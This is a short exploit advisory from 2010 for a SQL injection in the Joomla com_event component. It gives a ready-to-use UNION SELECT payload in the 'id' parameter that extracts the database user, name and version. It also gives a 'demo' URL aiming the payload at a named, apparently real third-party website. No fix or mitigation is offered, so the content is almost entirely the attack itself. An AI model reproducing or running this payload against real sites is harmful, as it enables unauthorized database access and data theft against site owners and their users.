# Exploit Title: Joomla Component com_event another sql injection vuln

# Date: 17/5/2010

# Author: N/A

# Software Link: www.joomla.org/download.html

# Version: Multible versions

# Code :
The Attacker Can Exploit A SQL injection vuln in the following:


The Sql injection query:

index.php?option=com_event&task=view&id=-14 UnioN/**/SelECt 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4--

Demo:

http://cbscommunitycenter.com/index.php?option=com_event&task=view&id=-14%20UnioN/**/SelECt%201,2,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,4--

Thanks To All Muslims

h8k@hotmail.it 
 		 	   		  
_________________________________________________________________
Hotmail: Trusted email with Microsoft’s powerful SPAM protection.
https://signup.live.com/signup.aspx?id=60969